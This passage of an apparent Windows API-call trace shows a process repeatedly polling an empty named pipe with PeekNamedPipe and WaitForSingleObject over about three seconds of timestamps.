lpBytesLeftThisMessage=0x0) returned 1 [0113.593] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.623] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.623] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.655] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.655] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.685] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.685] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.717] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.717] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.747] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.747] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.779] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.779] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.811] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.811] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.842] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.842] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.872] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.872] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.904] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.904] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.934] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.934] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.967] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.967] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0113.997] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0113.997] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.029] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.029] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.059] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.059] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.092] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.092] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.129] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.129] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.153] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.154] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.184] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.184] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.217] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.217] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.247] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.247] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.280] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.280] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.309] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.309] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.342] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.342] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.371] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.371] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.403] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.403] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.434] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.434] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.467] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.467] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.496] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.496] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.529] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.529] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.558] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.558] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.591] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.592] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.621] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.621] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.653] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.654] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.683] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.683] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.716] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.716] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.745] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.746] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.778] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.778] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.808] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.808] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.841] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.841] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.870] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.870] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.918] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.918] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.949] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.949] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0114.979] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0114.980] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.011] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.011] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.042] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.042] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.074] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.075] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.104] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.104] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.135] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.136] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.167] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.167] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.199] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.199] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.229] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.229] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.261] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.262] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.292] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.292] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.721] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.721] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.744] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.744] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.775] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.775] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.866] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.866] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.884] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.884] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.915] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.916] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.947] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.947] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0115.979] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0115.979] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.010] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.010] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.040] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.041] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.073] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.073] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.103] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.103] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.134] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.134] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.175] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0116.175] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0116.197] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 